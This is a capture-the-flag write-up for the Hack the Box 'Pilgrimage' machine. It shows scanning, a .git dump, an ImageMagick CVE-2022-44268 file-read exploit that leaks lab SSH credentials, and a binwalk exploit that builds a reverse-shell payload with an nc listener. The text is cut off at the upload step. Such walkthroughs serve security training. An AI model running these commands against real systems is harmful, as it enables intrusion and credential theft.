Skip to content

Latest commit

 

History

History
166 lines (138 loc) · 5.71 KB

pilgrimage.md

File metadata and controls

166 lines (138 loc) · 5.71 KB

Hack the Box - Pilgrimage

Port Scan

rustscan -a 10.10.11.219 -r 0-65535 --ulimit 5000

image

Service Scan

nmap -sV -sC -A --min-rate 1000 10.10.11.219 -p 22,80

image

HTTP

/index.php

http://pilgrimage.htb/index.php

image

/login.php

http://pilgrimage.htb/login.php

image

/register.php

http://pilgrimage.htb/register.php

image

/.git

http://pilgrimage,htb/.git/

image

Dump /.git

git-dumper http://pilgrimage.htb/.git/ git

image

Interaction

Create Account

image

Login

image

Dashboard

http://pilgrimage.htb/dashboard.php

image

Shrink Image

image

Shrunk Image

image image

Source Code

  • The code uses "magick" to shrink the uploaded image. image

Search Exploits

searchsploit magick

image image

Exploit - Magick (Arbitrary File Read): CVE-2022-44268

The exploit allows to read arbitrary files on the server. The suggested exploit is scripted in rust. I will be using an explot scripted in python.

https://github.com/kljunowsky/CVE-2022-44268
  • Prepare Payload
python3 CVE-2022-44268.py --image image.png --file-to-read /etc/passwd --output payload.png

  • Upload Payload image

  • Payload URL image

  • Read Files

python3 CVE-2022-44268.py --url http://pilgrimage.htb/shrunk/64f5b8058a661.png

image

  • Identified Users

    • root
    • emily

  • The code in /register.php contains: image

  • Prepare a payload and read the file as done in the previous step. I had to modify the script as it was throwing an error. Now I get the output as hex.

python3 CVE-2022-44268.py --url http://pilgrimage.htb/shrunk/64f5bc11c30f2.png | tee data.hex
  • Convert the received hex data as an image to string.
cat data.hex | xxd -r -p && echo ''

image

  • Credentials found: emily:abigchonkyboi123

FootHold

ssh emily@10.10.11.219

image

List Processes

ps -aux

image

  • Contents of /usr/sbin/malwarescan.sh image

  • The bash script uses a command inotifywait to monitor a directory for newly created files and then checks if the content of those files contains certain blacklisted phrases using the binwalk tool.

  • binwalk version 2.3.2 image

Search Exploits

searchsploit binwalk

image

searchsploit -m python/remote/51249.py

image

  • Prepare Payload
python3 51249.py poison.png 10.10.14.61 4444

image

  • Rename Exploit
mv binwalk_exploit.png pwnstuff.png
  • Start a netcat listener
rlwrap nc -nlvvp 4444
  • Start a local python server
python -m http.server 9999
  • Upload the payload file (binwalk_exploit.png) to the target. Since the bash script malwarescan.sh uses the binwalk tool to scan the images uploaded to the /var/www/pilgrimage.htb/shrunk directory, the payload needs to be placed here. image